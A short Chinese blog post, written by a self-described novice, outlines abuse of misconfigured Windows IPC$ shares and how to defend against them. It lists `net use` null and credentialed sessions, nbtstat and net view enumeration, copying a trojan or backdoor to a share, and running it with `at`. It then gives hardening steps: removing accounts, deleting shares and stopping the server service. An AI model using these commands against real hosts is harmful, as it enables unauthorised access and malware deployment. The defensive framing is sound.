windows上IPC配置不当利用以及防护

主要都是看这篇文章的http://blog.csdn.net/bytxl/article/details/46790995
这里自己总结一下，因为没有环境实战，也没有实战经验，所以就理理思路。

首先，
建立空连接

net use \\ip\ipc$  ""  /user:""

或者非空连接

net use \\ip\ipc$  "password"  /user:"username"

这里顺便讲一下删除连接

net use \\ip\ipc$ /del

当然建立空连接的时候可以通过某些方法得到用户名和密码，具体我不会做，只知道这个可以获得用户名。

nbtstat -A \\ip

然后查看目标主机上有哪些共享目录

net view \\ip

接着就是往共享目录上上传文件（木马后门），当然你得有写入权限，至于权限的获取我并不会。

copy 要复制的文件及路径  目的路径

最后当然是运行这个文件
获取远程主机的时间

net time \\ip

用at运行刚才上传的文件，运行时间是远程主机的时间

at  \\ip  时间  程序名

好吧at命令似乎不支持了，改天再尝试。

防护主要从两个方面，一个是删除多余的账户，另一个是删除默认共享。
删除多余的账户可以参考
http://blog.csdn.net/qq_27607539/article/details/76019992
这个方法。
删除不必要的共享可以用

net share

查看自己有哪些共享，然后用

net share 共享名 /del

删除掉，更狠一点的可以直接禁用server服务：

net stop server /f